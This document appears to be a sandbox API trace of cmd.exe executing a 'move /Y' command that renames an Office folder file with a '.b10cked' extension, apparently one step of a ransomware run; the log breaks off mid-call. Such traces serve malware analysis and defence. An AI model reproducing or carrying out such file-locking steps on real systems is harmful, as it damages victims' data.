Region: id = 22885 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 351 os_tid = 0x7b8 [0168.468] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f8a4 | out: lpSystemTimeAsFileTime=0x14f8a4*(dwLowDateTime=0x9b911bc0, dwHighDateTime=0x1d440a9)) [0168.468] GetCurrentProcessId () returned 0x308 [0168.468] GetCurrentThreadId () returned 0x7b8 [0168.468] GetTickCount () returned 0x31cc3 [0168.468] QueryPerformanceCounter (in: lpPerformanceCount=0x14f89c | out: lpPerformanceCount=0x14f89c*=22525760534) returned 1 [0168.469] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0168.469] __set_app_type (_Type=0x1) [0168.469] __p__fmode () returned 0x76b331f4 [0168.469] __p__commode () returned 0x76b331fc [0168.470] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0168.470] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0168.470] GetCurrentThreadId () returned 0x7b8 [0168.470] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7b8) returned 0x38 [0168.470] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0168.470] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0168.470] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.490] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0168.490] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f834 | out: phkResult=0x14f834*=0x0) returned 0x2 [0168.490] VirtualQuery (in: lpAddress=0x14f86b, lpBuffer=0x14f804, dwLength=0x1c | out: lpBuffer=0x14f804*(BaseAddress=0x14f000, AllocationBase=0x50000, 
AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.490] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f804, dwLength=0x1c | out: lpBuffer=0x14f804*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0168.490] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f804, dwLength=0x1c | out: lpBuffer=0x14f804*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0168.490] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14f804, dwLength=0x1c | out: lpBuffer=0x14f804*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.490] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f804, dwLength=0x1c | out: lpBuffer=0x14f804*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0168.490] GetConsoleOutputCP () returned 0x1b5 [0168.491] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.491] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0168.491] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.491] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0168.491] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.491] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0168.492] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.492] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0168.492] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.492] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0168.492] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.493] SetConsoleMode 
(hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0168.498] GetEnvironmentStringsW () returned 0x2e0210* [0168.498] FreeEnvironmentStringsW (penv=0x2e0210) returned 1 [0168.499] GetEnvironmentStringsW () returned 0x2e0210* [0168.499] FreeEnvironmentStringsW (penv=0x2e0210) returned 1 [0168.499] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e7a4 | out: phkResult=0x14e7a4*=0x40) returned 0x0 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x0, lpData=0x14e7b0*=0xa0, lpcbData=0x14e7a8*=0x1000) returned 0x2 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x4, lpData=0x14e7b0*=0x1, lpcbData=0x14e7a8*=0x4) returned 0x0 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x0, lpData=0x14e7b0*=0x1, lpcbData=0x14e7a8*=0x1000) returned 0x2 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x4, lpData=0x14e7b0*=0x0, lpcbData=0x14e7a8*=0x4) returned 0x0 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x4, lpData=0x14e7b0*=0x40, lpcbData=0x14e7a8*=0x4) returned 0x0 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x4, lpData=0x14e7b0*=0x40, lpcbData=0x14e7a8*=0x4) returned 0x0 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", 
lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x0, lpData=0x14e7b0*=0x40, lpcbData=0x14e7a8*=0x1000) returned 0x2 [0168.499] RegCloseKey (hKey=0x40) returned 0x0 [0168.499] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e7a4 | out: phkResult=0x14e7a4*=0x40) returned 0x0 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x0, lpData=0x14e7b0*=0x40, lpcbData=0x14e7a8*=0x1000) returned 0x2 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x4, lpData=0x14e7b0*=0x1, lpcbData=0x14e7a8*=0x4) returned 0x0 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x0, lpData=0x14e7b0*=0x1, lpcbData=0x14e7a8*=0x1000) returned 0x2 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x4, lpData=0x14e7b0*=0x0, lpcbData=0x14e7a8*=0x4) returned 0x0 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x4, lpData=0x14e7b0*=0x9, lpcbData=0x14e7a8*=0x4) returned 0x0 [0168.500] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x4, lpData=0x14e7b0*=0x9, lpcbData=0x14e7a8*=0x4) returned 0x0 [0168.500] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, 
lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x0, lpData=0x14e7b0*=0x9, lpcbData=0x14e7a8*=0x1000) returned 0x2 [0168.500] RegCloseKey (hKey=0x40) returned 0x0 [0168.500] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886386 [0168.500] srand (_Seed=0x5b886386) [0168.500] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked\"" [0168.500] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked\"" [0168.500] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.500] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0168.500] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0168.500] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0168.500] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.501] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0168.501] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0168.501] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0168.501] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0168.501] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 
[0168.501] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0168.501] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0168.501] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0168.501] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0168.501] GetEnvironmentStringsW () returned 0x2e2360* [0168.501] FreeEnvironmentStringsW (penv=0x2e2360) returned 1 [0168.501] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.501] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.501] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0168.501] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0168.501] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0168.501] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0168.501] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0168.501] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0168.501] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0168.501] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0168.501] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f570 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.501] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f570, lpFilePart=0x14f56c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f56c*="Desktop") returned 0x18 [0168.501] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0168.501] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f2ec | out: lpFindFileData=0x14f2ec) returned 0x2e09f0 [0168.502] FindClose (in: hFindFile=0x2e09f0 | out: hFindFile=0x2e09f0) returned 1 [0168.502] 
FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f2ec | out: lpFindFileData=0x14f2ec) returned 0x2e09f0 [0168.502] FindClose (in: hFindFile=0x2e09f0 | out: hFindFile=0x2e09f0) returned 1 [0168.502] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f2ec | out: lpFindFileData=0x14f2ec) returned 0x2e09f0 [0168.502] FindClose (in: hFindFile=0x2e09f0 | out: hFindFile=0x2e09f0) returned 1 [0168.502] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0168.502] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0168.502] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0168.502] GetEnvironmentStringsW () returned 0x2e0210* [0168.503] FreeEnvironmentStringsW (penv=0x2e0210) returned 1 [0168.503] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.503] GetConsoleOutputCP () returned 0x1b5 [0168.504] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.504] GetUserDefaultLCID () returned 0x409 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f6b0, cchData=128 | out: lpLCData="0") returned 2 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f6b0, cchData=128 | out: lpLCData="0") returned 2 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f6b0, cchData=128 | out: lpLCData="1") returned 2 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0168.506] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0168.506] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0168.507] GetConsoleTitleW (in: lpConsoleTitle=0x2d0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.513] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0168.513] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0168.513] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0168.515] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0168.516] _wcsicmp (_String1="move", _String2=")") returned 68 [0168.516] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0168.516] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0168.516] _wcsicmp (_String1="IF", _String2="move") returned -4 [0168.516] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0168.516] _wcsicmp (_String1="REM", _String2="move") returned 5 [0168.516] _wcsicmp 
(_String1="REM/?", _String2="move") returned 5 [0168.521] GetConsoleTitleW (in: lpConsoleTitle=0x14f3a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.522] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0168.522] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0168.522] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0168.522] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0168.522] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0168.522] _wcsicmp (_String1="move", _String2="CD") returned 10 [0168.522] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0168.522] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0168.522] _wcsicmp (_String1="move", _String2="REN") returned -5 [0168.522] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0168.522] _wcsicmp (_String1="move", _String2="SET") returned -6 [0168.522] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0168.522] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0168.522] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0168.522] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0168.522] _wcsicmp (_String1="move", _String2="MD") returned 11 [0168.522] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0168.522] _wcsicmp (_String1="move", _String2="RD") returned -5 [0168.522] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0168.522] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0168.522] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0168.522] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0168.522] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0168.522] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0168.522] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0168.522] _wcsicmp (_String1="move", _String2="VER") returned -9 [0168.522] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0168.522] 
_wcsicmp (_String1="move", _String2="EXIT") returned 8 [0168.522] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0168.522] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0168.522] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0168.523] _wcsicmp (_String1="move", _String2="START") returned -6 [0168.523] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0168.523] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0168.523] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0168.525] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.525] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.525] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14f164, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x14f15c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14f15c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0168.525] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0168.525] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0168.525] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0168.525] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0168.525] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0168.526] _wcsnicmp 
(_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0168.527] _wcsnicmp (_String1="/Y", 
_String2="/Y", _MaxCount=0x2) returned 0 [0168.527] _wcsicmp (_String1="MOR6IN~1.TRX", _String2=".") returned 63 [0168.527] _wcsicmp (_String1="MOR6IN~1.TRX", _String2="..") returned 63 [0168.527] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mor6in~1.trx")) returned 0x2020 [0168.527] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2e1f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.527] SetErrorMode (uMode=0x0) returned 0x0 [0168.528] SetErrorMode (uMode=0x1) returned 0x0 [0168.528] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX", nBufferLength=0x104, lpBuffer=0x14eaec, lpFilePart=0x14ead4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX", lpFilePart=0x14ead4*="MOR6IN~1.TRX") returned 0x3c [0168.528] SetErrorMode (uMode=0x0) returned 0x1 [0168.528] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0168.528] _wcsicmp (_String1="MOR6IN~1.TRX", _String2=".") returned 63 [0168.528] _wcsicmp (_String1="MOR6IN~1.TRX", _String2="..") returned 63 [0168.528] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mor6in~1.trx")) returned 0x2020 [0168.528] SetErrorMode (uMode=0x0) returned 0x0 [0168.528] SetErrorMode (uMode=0x1) returned 0x0 [0168.528] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX", nBufferLength=0x104, lpBuffer=0x14ef68, lpFilePart=0x14ed00 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX", lpFilePart=0x14ed00*="MOR6IN~1.TRX") returned 0x3c [0168.528] SetErrorMode (uMode=0x0) returned 0x1 
[0168.529] SetErrorMode (uMode=0x0) returned 0x0 [0168.529] SetErrorMode (uMode=0x1) returned 0x0 [0168.529] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x14f170, lpFilePart=0x14ed00 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked", lpFilePart=0x14ed00*="MOR6INT.REST.trx_dll.b10cked") returned 0x4c [0168.529] SetErrorMode (uMode=0x0) returned 0x1 [0168.529] SetLastError (dwErrCode=0x0) [0168.529] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mor6int.rest.trx_dll.b10cked")) returned 0xffffffff [0168.529] GetLastError () returned 0x2 [0168.529] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x14e67c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e67c) returned 0x2e2130 [0168.529] FindNextFileW (in: hFindFile=0x2e2130, lpFindFileData=0x14e67c | out: lpFindFileData=0x14e67c) returned 0 [0168.530] GetLastError () returned 0x12 [0168.530] FindClose 